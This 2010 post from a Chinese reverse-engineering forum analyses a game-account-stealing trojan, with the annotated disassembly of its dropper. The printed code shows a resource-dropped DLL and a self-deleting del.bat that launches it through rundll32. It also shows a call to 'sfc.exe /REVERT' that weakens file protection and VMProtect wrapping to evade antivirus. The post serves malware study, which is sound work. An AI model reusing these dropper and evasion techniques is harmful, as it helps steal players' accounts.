[原创]一个非主流木马的分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]一个非主流木马的分析

发表于: 2010-7-1 13:56 2828

[原创]一个非主流木马的分析

xiaowz

2010-7-1 13:56

2828

文章作者】:  electric009
【作者邮箱】: electric009@sina.com
【作者QQ号】: 153074250
【使用工具】: OD1.1 + IDA5.5
【操作平台】: XP-SP3
主要行为:
1.释放临时文件1.tmp
2.通过全局变量修改临时文件
3.释放批处理文件del.bat，并把1.tmp拷贝到s6am.ime(dll文件)
4. 通过批处理文件调用rundll32.exe把s6am.ime加载到内存中，并且自删除。
5.s36am.ime比较宿主进程是否是dnf.exe，然后搜索内存特征码盗号。

前言：为什么说我叫这个马马叫非主流马马，可能大家比较奇怪，因为我见过大多数盗号的马马都是感染d3d9.dll,d3d8.dll这些游戏关键动态库，
而这个马马是通过批处理文件调用rundll32.exe把s6am.ime加载到内存中，然后盗号，不是dll入驻，兵法云，出奇制胜，或许能收到意想不到的结果。
闲话少说，进入正题：

PX0:004014A0
UPX0:004014A0                public start
UPX0:004014A0 start          proc near             ; CODE XREF: sub_4174DB+158j
UPX0:004014A0
UPX0:004014A0 PathName       = byte ptr -10h
UPX0:004014A0 var_4          = dword ptr -4
UPX0:004014A0
UPX0:004014A0                push ebp
UPX0:004014A1                mov    ebp, esp
UPX0:004014A3                sub    esp, 10h
UPX0:004014A6                push ebx
UPX0:004014A7                push esi
UPX0:004014A8                push edi
UPX0:004014A9                push 0             ; hModule
UPX0:004014AB                call FormatString ; 格式化一个字符串jackson.bat，后来联系上下文发现这个字符串没有用，估计是木马
UPX0:004014AB                                        ; 的变种，作者没有注释掉
UPX0:004014B0                mov    esi, wsprintfA
UPX0:004014B6                add    esp, 4
UPX0:004014B9                push offset szShortPathSystemDirectory
UPX0:004014BE                push offset aSsystemp ; "%ssystemp"
UPX0:004014C3                push offset lpszSysDir_Systemp ; LPSTR
UPX0:004014C8                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\systemp
UPX0:004014CA                add    esp, 0Ch
UPX0:004014CD                push offset szShortPathSystemDirectory
UPX0:004014D2                push offset aSmsimg32_dll ; "%smsimg32.dll"
UPX0:004014D7                push offset lpszMsimg32_dllFileName ; LPSTR
UPX0:004014DC                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\msimg32.dll
UPX0:004014DE                add    esp, 0Ch
UPX0:004014E1                push offset szShortPathSystemDirectory
UPX0:004014E6                push offset aSsfc_exe ; "%ssfc.exe"
UPX0:004014EB                push offset lpszSfc_EXEFileName ; LPSTR
UPX0:004014F0                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\sfc.exe
UPX0:004014F2                add    esp, 0Ch
UPX0:004014F5                push offset szShortPathSystemDirectory
UPX0:004014FA                push offset aSsfc_os_dll ; "%ssfc_os.dll"
UPX0:004014FF                push offset ExistingFileName ; LPSTR
UPX0:00401504                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\sfc_os_dll
UPX0:00401506                add    esp, 0Ch
UPX0:00401509                push offset szShortPathSystemDirectory
UPX0:0040150E                push offset aSs6am_ime ; "%ss6am.ime"
UPX0:00401513                push offset pszPath  ; LPSTR
UPX0:00401518                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\s6am.ime
UPX0:0040151A                add    esp, 0Ch
UPX0:0040151D                push offset szShortPathSystemDirectory
UPX0:00401522                push offset aSsfcos_dll ; "%ssfcos.dll"
UPX0:00401527                push offset NewFileName ; LPSTR
UPX0:0040152C                call esi ; wsprintfA ; 格式化字符串c:\WINDOWS\system32\sfcos.dll
UPX0:0040152E                add    esp, 0Ch
UPX0:00401531                push 1             ; bFailIfExists
UPX0:00401533                push offset NewFileName ; lpNewFileName
UPX0:00401538                push offset ExistingFileName ; lpExistingFileName
UPX0:0040153D                call CopyFileA    ; 把系统文件sfc_os_dll复制到sfcos.dll
UPX0:00401543                lea    eax, [ebp+PathName]
UPX0:00401546                push eax
UPX0:00401547                call IsSysDriverWhere ; 判断系统盘在c盘
UPX0:0040154C                mov    ebx, GetTempFileNameA
UPX0:00401552                add    esp, 4
UPX0:00401555                lea    ecx, [ebp+PathName]
UPX0:00401558                push offset FileName ; lpTempFileName
UPX0:0040155D                push 0             ; uUnique
UPX0:0040155F                push 0             ; lpPrefixString
UPX0:00401561                push ecx          ; lpPathName
UPX0:00401562                call ebx ; GetTempFileNameA ; 生成临时文件c:\1.tmp
UPX0:00401564                push offset FileName ; lpFileName
UPX0:00401569                call DeleteFileA
UPX0:0040156F                push offset FileName ; lpFileName
UPX0:00401574                push offset Type    ; "IME"
UPX0:00401579                push 66h          ; lpName
UPX0:0040157B                push 0             ; hModule
UPX0:0040157D                call FindResourceA
UPX0:00401583                push eax          ; NumberOfBytesWritten
UPX0:00401584                call WriteDataToTemp ; 写数据到临时文件c:\1.tmp中
UPX0:00401589                push 10Eh          ; Count
UPX0:0040158E                push offset szModuleFileName ; Filename
UPX0:00401593                push offset dword_4039AC ; int
UPX0:00401598                call _memset       ; 作者自己模拟memset函数自己写的一个初始化函数
UPX0:0040159D                push 0B4h          ; Count
UPX0:004015A2                push offset szModuleFileName ; Filename
UPX0:004015A7                push offset dword_403A10 ; int
UPX0:004015AC                call _memset
UPX0:004015B1                push 5Ah          ; Count
UPX0:004015B3                push offset szModuleFileName ; Filename
UPX0:004015B8                push offset dword_4038E4 ; int
UPX0:004015BD                call _memset
UPX0:004015C2                push 112h          ; Count
UPX0:004015C7                push offset szModuleFileName ; Filename
UPX0:004015CC                push offset dword_403948 ; int
UPX0:004015D1                call _memset
UPX0:004015D6                push 0             ; Time
UPX0:004015D8                call time
UPX0:004015DD                push eax          ; Seed
UPX0:004015DE                call srand          ; 用系统时间产生种子使产生的随机数相同的概率降到最低
UPX0:004015E3                add    esp, 40h
UPX0:004015E6                mov    edi, 1F4h
UPX0:004015EB
UPX0:004015EB loc_4015EB:                            ; CODE XREF: start+173j
UPX0:004015EB                call rand
UPX0:004015F0                mov    [ebp+var_4], eax
UPX0:004015F3                fild [ebp+var_4]
UPX0:004015F6                fmul dbl_4020E0
UPX0:004015FC                fmul dbl_4020D8
UPX0:00401602                fadd dbl_4020D0
UPX0:00401608                call _ftol
UPX0:0040160D                dec    edi
UPX0:0040160E                mov    dword_4034F8, eax
UPX0:00401613                jnz    short loc_4015EB
UPX0:00401615                push eax
UPX0:00401616                push offset aD    ; "%d"
UPX0:0040161B                push offset byte_403A74 ; LPSTR
UPX0:00401620                call esi ; wsprintfA
UPX0:00401622                push 10Eh          ; int
UPX0:00401627                push offset FileName ; Filename
UPX0:0040162C                push offset dword_4039AC ; int
UPX0:00401631                call ReviseTmpFile ; 通过全局变量修改临时文件
UPX0:00401636                push 0B4h          ; int
UPX0:0040163B                push offset FileName ; Filename
UPX0:00401640                push offset dword_403A10 ; int
UPX0:00401645                call ReviseTmpFile
UPX0:0040164A                push 5Ah          ; int
UPX0:0040164C                push offset FileName ; Filename
UPX0:00401651                push offset dword_4038E4 ; int
UPX0:00401656                call ReviseTmpFile
UPX0:0040165B                push 112h          ; int
UPX0:00401660                push offset FileName ; Filename
UPX0:00401665                push offset dword_403948 ; int
UPX0:0040166A                call ReviseTmpFile
UPX0:0040166F                push 0B8h          ; int
UPX0:00401674                push offset FileName ; Filename
UPX0:00401679                push offset byte_403A74 ; int
UPX0:0040167E                call ReviseTmpFile
UPX0:00401683                mov    edi, PathFileExistsA
UPX0:00401689                add    esp, 48h
UPX0:0040168C                push offset pszPath  ; pszPath
UPX0:00401691                call edi ; PathFileExistsA ; 判断system32下是否存在s6am.ime
UPX0:00401693                mov    esi, MoveFileA
UPX0:00401699                test eax, eax
UPX0:0040169B                jz    short loc_4016C4
UPX0:0040169D                push offset TempFileName ; lpTempFileName
UPX0:004016A2                push 0             ; uUnique
UPX0:004016A4                push 0             ; lpPrefixString
UPX0:004016A6                push offset szShortPathTempDirectroy ; lpPathName
UPX0:004016AB                call ebx ; GetTempFileNameA
UPX0:004016AD                push offset TempFileName ; lpFileName
UPX0:004016B2                call DeleteFileA
UPX0:004016B8                push offset TempFileName ; lpNewFileName
UPX0:004016BD                push offset pszPath  ; lpExistingFileName
UPX0:004016C2                call esi ; MoveFileA
UPX0:004016C4
UPX0:004016C4 loc_4016C4:                            ; CODE XREF: start+1FBj
UPX0:004016C4                push offset pszPath  ; lpNewFileName
UPX0:004016C9                push offset FileName ; lpExistingFileName
UPX0:004016CE                call esi ; MoveFileA ; c:\1.tmp实现自删除并拷贝到s6am.ime中
UPX0:004016D0                push offset lpszSysDir_Systemp ; pszPath
UPX0:004016D5                call edi ; PathFileExistsA
UPX0:004016D7                test eax, eax
UPX0:004016D9                jz    short loc_401702
UPX0:004016DB                push offset TempFileName ; lpTempFileName
UPX0:004016E0                push 0             ; uUnique
UPX0:004016E2                push 0             ; lpPrefixString
UPX0:004016E4                push offset szShortPathTempDirectroy ; lpPathName
UPX0:004016E9                call ebx ; GetTempFileNameA
UPX0:004016EB                push offset TempFileName ; lpFileName
UPX0:004016F0                call DeleteFileA
UPX0:004016F6                push offset TempFileName ; lpNewFileName
UPX0:004016FB                push offset lpszSysDir_Systemp ; lpExistingFileName
UPX0:00401700                call esi ; MoveFileA
UPX0:00401702
UPX0:00401702 loc_401702:                            ; CODE XREF: start+239j
UPX0:00401702                push offset lpszSysDir_Systemp ; lpFileName
UPX0:00401707                push offset aSys    ; "SYS"
UPX0:0040170C                push 65h          ; lpName
UPX0:0040170E                push 0             ; hModule
UPX0:00401710                call FindResourceA
UPX0:00401716                push eax          ; NumberOfBytesWritten
UPX0:00401717                call WriteDataToTemp ; 释放文件systemp
UPX0:0040171C                add    esp, 8
UPX0:0040171F                mov    esi, CreateFileA
UPX0:00401725                push 0             ; lpFileSizeHigh
UPX0:00401727                push 0             ; hTemplateFile
UPX0:00401729                push 0             ; dwFlagsAndAttributes
UPX0:0040172B                push 3             ; dwCreationDisposition
UPX0:0040172D                push 0             ; lpSecurityAttributes
UPX0:0040172F                push 0             ; dwShareMode
UPX0:00401731                push 0             ; dwDesiredAccess
UPX0:00401733                push offset lpszMsimg32_dllFileName ; lpFileName
UPX0:00401738                call esi ; CreateFileA ; 打开msimg32.dll
UPX0:0040173A                mov    ebx, GetFileSize
UPX0:00401740                push eax          ; hFile
UPX0:00401741                call ebx ; GetFileSize
UPX0:00401743                push 0             ; lpFileSizeHigh
UPX0:00401745                push 0             ; hTemplateFile
UPX0:00401747                push 0             ; dwFlagsAndAttributes
UPX0:00401749                push 3             ; dwCreationDisposition
UPX0:0040174B                push 0             ; lpSecurityAttributes
UPX0:0040174D                push 0             ; dwShareMode
UPX0:0040174F                mov    edx, eax
UPX0:00401751                push 0             ; dwDesiredAccess
UPX0:00401753                push offset lpszSysDir_Systemp ; lpFileName
UPX0:00401758                mov    [ebp+var_4], edx
UPX0:0040175B                call esi ; CreateFileA ; 打开systemp文件
UPX0:0040175D                push eax          ; hFile
UPX0:0040175E                call ebx ; GetFileSize
UPX0:00401760                mov    edx, [ebp+var_4]
UPX0:00401763                cmp    edx, eax
UPX0:00401765                jnz    short loc_401774
UPX0:00401767                push offset lpszSysDir_Systemp ; lpFileName
UPX0:0040176C                call DeleteFileA
UPX0:00401772                jmp    short loc_4017AA
UPX0:00401774 ; ---------------------------------------------------------------------------
UPX0:00401774
UPX0:00401774 loc_401774:                            ; CODE XREF: start+2C5j
UPX0:00401774                mov    esi, Sleep
UPX0:0040177A
UPX0:0040177A loc_40177A:                            ; CODE XREF: start+2EAj
UPX0:0040177A                push 0C8h          ; dwMilliseconds
UPX0:0040177F                call esi ; Sleep
UPX0:00401781                push offset lpszSysDir_Systemp ; pszPath
UPX0:00401786                call edi ; PathFileExistsA
UPX0:00401788                test eax, eax
UPX0:0040178A                jz    short loc_40177A
UPX0:0040178C                push 0             ; nShowCmd
UPX0:0040178E                push offset szShortPathSystemDirectory ; lpDirectory
UPX0:00401793                push offset Parameters ; "/REVERT"
UPX0:00401798                push offset lpszSfc_EXEFileName ; lpFile
UPX0:0040179D                push offset Operation ; "open"
UPX0:004017A2                push 0             ; hwnd
UPX0:004017A4                call ShellExecuteA ; 把文件检查器sfc.exe设置为默认，不检查受保护的系统文件
UPX0:004017AA
UPX0:004017AA loc_4017AA:                            ; CODE XREF: start+2D2j
UPX0:004017AA                jmp    short loc_4017BC
UPX0:004017AA ; ---------------------------------------------------------------------------
UPX0:004017AC aVmprotectBegin db 'VMProtect begin',0  ; 用VMProtect sdk保护关键call 防杀
UPX0:004017BC ; ---------------------------------------------------------------------------
UPX0:004017BC
UPX0:004017BC loc_4017BC:                            ; CODE XREF: start:loc_4017AAj
UPX0:004017BC                call sub_401000
UPX0:004017C1                jmp    short loc_4017D1
UPX0:004017C1 ; ---------------------------------------------------------------------------
UPX0:004017C3 aVmprotectEnd db 'VMProtect end',0
UPX0:004017D1 ; ---------------------------------------------------------------------------
UPX0:004017D1
UPX0:004017D1 loc_4017D1:                            ; CODE XREF: start+321j
UPX0:004017D1                push 0             ; uExitCode
UPX0:004017D3                call ExitProcess
UPX0:004017D3 start          endp
进入关键call看看
UPX0:00401000
UPX0:00401000 sub_401000    proc near             ; CODE XREF: start:loc_4017BCp
UPX0:00401000
UPX0:00401000 CmdLine       = byte ptr -3F4h
UPX0:00401000 var_3F0       = dword ptr -3F0h
UPX0:00401000 var_3EC       = word ptr -3ECh
UPX0:00401000 var_3EA       = byte ptr -3EAh
UPX0:00401000 Buffer       = byte ptr -3E8h
UPX0:00401000
UPX0:00401000                sub    esp, 3F4h
UPX0:00401006                push ebx
UPX0:00401007                push esi
UPX0:00401008                push edi
UPX0:00401009                or    ecx, 0FFFFFFFFh
UPX0:0040100C                mov    edi, offset dword_403074;通过全局变量解密批处理文件命令
UPX0:00401011                xor    eax, eax
UPX0:00401013                repne scasb
UPX0:00401015                not    ecx
UPX0:00401017                sub    edi, ecx
UPX0:00401019                lea    edx, [esp+400h+Buffer]
UPX0:0040101D                mov    eax, ecx
UPX0:0040101F                mov    esi, edi
UPX0:00401021                shr    ecx, 2
UPX0:00401024                mov    edi, edx
UPX0:00401026                lea    edx, [esp+400h+Buffer]
UPX0:0040102A                rep movsd
UPX0:0040102C                mov    ecx, eax
UPX0:0040102E                xor    eax, eax
UPX0:00401030                and    ecx, 3
UPX0:00401033                rep movsb
UPX0:00401035                or    ecx, 0FFFFFFFFh
UPX0:00401038                mov    edi, offset dword_40306C
UPX0:0040103D                repne scasb
UPX0:0040103F                not    ecx
UPX0:00401041                sub    edi, ecx
UPX0:00401043                mov    ebx, ecx
UPX0:00401045                mov    esi, edi
UPX0:00401047                or    ecx, 0FFFFFFFFh
UPX0:0040104A                mov    edi, edx
UPX0:0040104C                repne scasb
UPX0:0040104E                mov    ecx, ebx
UPX0:00401050                dec    edi
UPX0:00401051                shr    ecx, 2
UPX0:00401054                rep movsd
UPX0:00401056                mov    ecx, ebx
UPX0:00401058                lea    edx, [esp+400h+Buffer]
UPX0:0040105C                and    ecx, 3
UPX0:0040105F                rep movsb
UPX0:00401061                mov    edi, offset dword_403064
UPX0:00401066                or    ecx, 0FFFFFFFFh
UPX0:00401069                repne scasb
UPX0:0040106B                not    ecx
UPX0:0040106D                sub    edi, ecx
UPX0:0040106F                mov    esi, edi
UPX0:00401071                mov    ebx, ecx
UPX0:00401073                mov    edi, edx
UPX0:00401075                or    ecx, 0FFFFFFFFh
UPX0:00401078                repne scasb
UPX0:0040107A                mov    ecx, ebx
UPX0:0040107C                dec    edi
UPX0:0040107D                shr    ecx, 2
UPX0:00401080                rep movsd
UPX0:00401082                mov    ecx, ebx
UPX0:00401084                lea    edx, [esp+400h+Buffer]
UPX0:00401088                and    ecx, 3
UPX0:0040108B                rep movsb
UPX0:0040108D                mov    edi, offset dword_403060
UPX0:00401092                or    ecx, 0FFFFFFFFh
UPX0:00401095                repne scasb
UPX0:00401097                not    ecx
UPX0:00401099                sub    edi, ecx
UPX0:0040109B                mov    esi, edi
UPX0:0040109D                mov    ebx, ecx
UPX0:0040109F                mov    edi, edx
UPX0:004010A1                or    ecx, 0FFFFFFFFh
UPX0:004010A4                repne scasb
UPX0:004010A6                mov    ecx, ebx
UPX0:004010A8                dec    edi
UPX0:004010A9                shr    ecx, 2
UPX0:004010AC                rep movsd
UPX0:004010AE                mov    ecx, ebx
UPX0:004010B0                lea    edx, [esp+400h+Buffer]
UPX0:004010B4                and    ecx, 3
UPX0:004010B7                rep movsb
UPX0:004010B9                mov    edi, offset szModuleFileName
UPX0:004010BE                or    ecx, 0FFFFFFFFh
UPX0:004010C1                repne scasb
UPX0:004010C3                not    ecx
UPX0:004010C5                sub    edi, ecx
UPX0:004010C7                mov    esi, edi
UPX0:004010C9                mov    ebx, ecx
UPX0:004010CB                or    ecx, 0FFFFFFFFh
UPX0:004010CE                mov    edi, edx
UPX0:004010D0                repne scasb
UPX0:004010D2                mov    ecx, ebx
UPX0:004010D4                dec    edi
UPX0:004010D5                shr    ecx, 2
UPX0:004010D8                rep movsd
UPX0:004010DA                mov    ecx, ebx
UPX0:004010DC                lea    edx, [esp+400h+Buffer]
UPX0:004010E0                and    ecx, 3
UPX0:004010E3                rep movsb
UPX0:004010E5                or    ecx, 0FFFFFFFFh
UPX0:004010E8                mov    edi, offset dword_403060
UPX0:004010ED                repne scasb
UPX0:004010EF                not    ecx
UPX0:004010F1                sub    edi, ecx
UPX0:004010F3                mov    ebx, ecx
UPX0:004010F5                mov    esi, edi
UPX0:004010F7                or    ecx, 0FFFFFFFFh
UPX0:004010FA                mov    edi, edx
UPX0:004010FC                repne scasb
UPX0:004010FE                mov    ecx, ebx
UPX0:00401100                dec    edi
UPX0:00401101                shr    ecx, 2
UPX0:00401104                rep movsd
UPX0:00401106                mov    ecx, ebx
UPX0:00401108                lea    edx, [esp+400h+Buffer]
UPX0:0040110C                and    ecx, 3
UPX0:0040110F                rep movsb
UPX0:00401111                or    ecx, 0FFFFFFFFh
UPX0:00401114                mov    edi, offset dword_40305C
UPX0:00401119                repne scasb
UPX0:0040111B                not    ecx
UPX0:0040111D                sub    edi, ecx
UPX0:0040111F                mov    esi, edi
UPX0:00401121                mov    ebx, ecx
UPX0:00401123                or    ecx, 0FFFFFFFFh
UPX0:00401126                mov    edi, edx
UPX0:00401128                repne scasb
UPX0:0040112A                mov    ecx, ebx
UPX0:0040112C                dec    edi
UPX0:0040112D                shr    ecx, 2
UPX0:00401130                rep movsd
UPX0:00401132                mov    ecx, ebx
UPX0:00401134                lea    edx, [esp+400h+Buffer]
UPX0:00401138                and    ecx, 3
UPX0:0040113B                rep movsb
UPX0:0040113D                mov    edi, offset dword_403050
UPX0:00401142                or    ecx, 0FFFFFFFFh
UPX0:00401145                repne scasb
UPX0:00401147                not    ecx
UPX0:00401149                sub    edi, ecx
UPX0:0040114B                mov    esi, edi
UPX0:0040114D                mov    ebx, ecx
UPX0:0040114F                mov    edi, edx
UPX0:00401151                or    ecx, 0FFFFFFFFh
UPX0:00401154                repne scasb
UPX0:00401156                mov    ecx, ebx
UPX0:00401158                dec    edi
UPX0:00401159                shr    ecx, 2
UPX0:0040115C                rep movsd
UPX0:0040115E                mov    ecx, ebx
UPX0:00401160                lea    edx, [esp+400h+Buffer]
UPX0:00401164                and    ecx, 3
UPX0:00401167                rep movsb
UPX0:00401169                mov    edi, offset szModuleFileName
UPX0:0040116E                or    ecx, 0FFFFFFFFh
UPX0:00401171                repne scasb
UPX0:00401173                not    ecx
UPX0:00401175                sub    edi, ecx
UPX0:00401177                mov    esi, edi
UPX0:00401179                mov    ebx, ecx
UPX0:0040117B                mov    edi, edx
UPX0:0040117D                or    ecx, 0FFFFFFFFh
UPX0:00401180                repne scasb
UPX0:00401182                mov    ecx, ebx
UPX0:00401184                dec    edi
UPX0:00401185                shr    ecx, 2
UPX0:00401188                rep movsd
UPX0:0040118A                mov    ecx, ebx
UPX0:0040118C                and    ecx, 3
UPX0:0040118F                rep movsb
UPX0:00401191                or    ecx, 0FFFFFFFFh
UPX0:00401194                mov    edi, offset dword_403040
UPX0:00401199                repne scasb
UPX0:0040119B                not    ecx
UPX0:0040119D                sub    edi, ecx
UPX0:0040119F                lea    edx, [esp+400h+Buffer]
UPX0:004011A3                mov    esi, edi
UPX0:004011A5                mov    ebx, ecx
UPX0:004011A7                or    ecx, 0FFFFFFFFh
UPX0:004011AA                mov    edi, edx
UPX0:004011AC                repne scasb
UPX0:004011AE                mov    ecx, ebx
UPX0:004011B0                dec    edi
UPX0:004011B1                shr    ecx, 2
UPX0:004011B4                rep movsd
UPX0:004011B6                mov    ecx, ebx
UPX0:004011B8                lea    edx, [esp+400h+Buffer]
UPX0:004011BC                and    ecx, 3
UPX0:004011BF                rep movsb
UPX0:004011C1                or    ecx, 0FFFFFFFFh
UPX0:004011C4                mov    edi, offset dword_403038
UPX0:004011C9                repne scasb
UPX0:004011CB                not    ecx
UPX0:004011CD                sub    edi, ecx
UPX0:004011CF                mov    ebx, ecx
UPX0:004011D1                mov    esi, edi
UPX0:004011D3                or    ecx, 0FFFFFFFFh
UPX0:004011D6                mov    edi, edx
UPX0:004011D8                repne scasb
UPX0:004011DA                mov    ecx, ebx
UPX0:004011DC                dec    edi
UPX0:004011DD                shr    ecx, 2
UPX0:004011E0                rep movsd
UPX0:004011E2                mov    ecx, ebx
UPX0:004011E4                lea    edx, [esp+400h+Buffer]
UPX0:004011E8                and    ecx, 3
UPX0:004011EB                rep movsb
UPX0:004011ED                mov    edi, offset dword_403028
UPX0:004011F2                or    ecx, 0FFFFFFFFh
UPX0:004011F5                repne scasb
UPX0:004011F7                not    ecx
UPX0:004011F9                sub    edi, ecx
UPX0:004011FB                mov    esi, edi
UPX0:004011FD                mov    ebx, ecx
UPX0:004011FF                mov    edi, edx
UPX0:00401201                or    ecx, 0FFFFFFFFh
UPX0:00401204                repne scasb
UPX0:00401206                mov    ecx, ebx
UPX0:00401208                dec    edi
UPX0:00401209                shr    ecx, 2
UPX0:0040120C                rep movsd
UPX0:0040120E                mov    ecx, ebx
UPX0:00401210                lea    edx, [esp+400h+Buffer]
UPX0:00401214                and    ecx, 3
UPX0:00401217                rep movsb
UPX0:00401219                mov    edi, offset pszPath
UPX0:0040121E                or    ecx, 0FFFFFFFFh
UPX0:00401221                repne scasb
UPX0:00401223                not    ecx
UPX0:00401225                sub    edi, ecx
UPX0:00401227                mov    esi, edi
UPX0:00401229                mov    ebx, ecx
UPX0:0040122B                mov    edi, edx
UPX0:0040122D                or    ecx, 0FFFFFFFFh
UPX0:00401230                repne scasb
UPX0:00401232                mov    ecx, ebx
UPX0:00401234                dec    edi
UPX0:00401235                shr    ecx, 2
UPX0:00401238                rep movsd
UPX0:0040123A                mov    ecx, ebx
UPX0:0040123C                lea    edx, [esp+400h+Buffer]
UPX0:00401240                and    ecx, 3
UPX0:00401243                rep movsb
UPX0:00401245                mov    edi, offset dword_403020
UPX0:0040124A                or    ecx, 0FFFFFFFFh
UPX0:0040124D                repne scasb
UPX0:0040124F                not    ecx
UPX0:00401251                sub    edi, ecx
UPX0:00401253                mov    esi, edi
UPX0:00401255                mov    ebx, ecx
UPX0:00401257                or    ecx, 0FFFFFFFFh
UPX0:0040125A                mov    edi, edx
UPX0:0040125C                repne scasb
UPX0:0040125E                mov    ecx, ebx
UPX0:00401260                dec    edi
UPX0:00401261                shr    ecx, 2
UPX0:00401264                rep movsd
UPX0:00401266                mov    ecx, ebx
UPX0:00401268                lea    edx, [esp+400h+Buffer]
UPX0:0040126C                and    ecx, 3
UPX0:0040126F                push 0             ; iAttribute
UPX0:00401271                rep movsb
UPX0:00401273                mov    edi, offset dword_40305C
UPX0:00401278                or    ecx, 0FFFFFFFFh
UPX0:0040127B                repne scasb
UPX0:0040127D                not    ecx
UPX0:0040127F                sub    edi, ecx
UPX0:00401281                mov    esi, edi
UPX0:00401283                mov    ebx, ecx
UPX0:00401285                mov    edi, edx
UPX0:00401287                or    ecx, 0FFFFFFFFh
UPX0:0040128A                repne scasb
UPX0:0040128C                mov    ecx, ebx
UPX0:0040128E                dec    edi
UPX0:0040128F                shr    ecx, 2
UPX0:00401292                rep movsd
UPX0:00401294                mov    ecx, ebx
UPX0:00401296                lea    edx, [esp+404h+Buffer]
UPX0:0040129A                and    ecx, 3
UPX0:0040129D                rep movsb
UPX0:0040129F                mov    edi, offset dword_403018
UPX0:004012A4                or    ecx, 0FFFFFFFFh
UPX0:004012A7                repne scasb
UPX0:004012A9                not    ecx
UPX0:004012AB                sub    edi, ecx
UPX0:004012AD                mov    esi, edi
UPX0:004012AF                mov    ebx, ecx
UPX0:004012B1                mov    edi, edx
UPX0:004012B3                or    ecx, 0FFFFFFFFh
UPX0:004012B6                repne scasb
UPX0:004012B8                mov    ecx, ebx
UPX0:004012BA                dec    edi
UPX0:004012BB                shr    ecx, 2
UPX0:004012BE                rep movsd
UPX0:004012C0                mov    eax, dword_40300C
UPX0:004012C5                mov    ecx, ebx
UPX0:004012C7                and    ecx, 3
UPX0:004012CA                mov    dx, word_403014
UPX0:004012D1                rep movsb
UPX0:004012D3                mov    ecx, dword_403010
UPX0:004012D9                mov    dword ptr [esp+404h+CmdLine], eax
UPX0:004012DD                mov    al, byte_403016
UPX0:004012E2                mov    [esp+404h+var_3F0], ecx
UPX0:004012E6                lea    ecx, [esp+404h+CmdLine]
UPX0:004012EA                mov    [esp+404h+var_3EC], dx
UPX0:004012EF                push ecx          ; lpPathName
UPX0:004012F0                mov    [esp+408h+var_3EA], al
UPX0:004012F4                call _lcreat       ; 创建批处理文件c:\del.bat
UPX0:004012FA                mov    esi, eax
UPX0:004012FC                lea    edi, [esp+400h+Buffer]
UPX0:00401300                or    ecx, 0FFFFFFFFh
UPX0:00401303                xor    eax, eax
UPX0:00401305                repne scasb
UPX0:00401307                not    ecx
UPX0:00401309                dec    ecx
UPX0:0040130A                lea    edx, [esp+400h+Buffer]
UPX0:0040130E                push ecx          ; lBytes
UPX0:0040130F                push edx          ; lpBuffer
UPX0:00401310                push esi          ; hFile
UPX0:00401311                call _hwrite       ; 写批处理文件:try
UPX0:00401311                                        ; del "C:\mama\dumped_.exe"
UPX0:00401311                                        ;  if exist "C:\mama\dumped_.exe" goto try
UPX0:00401311                                        ; start rundll32.exe C:\WINDOWS\system32\s6am.ime,Runed
UPX0:00401311                                        ;  del %0
UPX0:00401311                                        ;
UPX0:00401317                push esi          ; hFile
UPX0:00401318                call _lclose
UPX0:0040131E                lea    eax, [esp+400h+CmdLine]
UPX0:00401322                push 0             ; uCmdShow
UPX0:00401324                push eax          ; lpCmdLine
UPX0:00401325                call WinExec
UPX0:0040132B                pop    edi
UPX0:0040132C                pop    esi
UPX0:0040132D                pop    ebx
UPX0:0040132E                add    esp, 3F4h
UPX0:00401334                retn
UPX0:00401334 sub_401000    endp

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：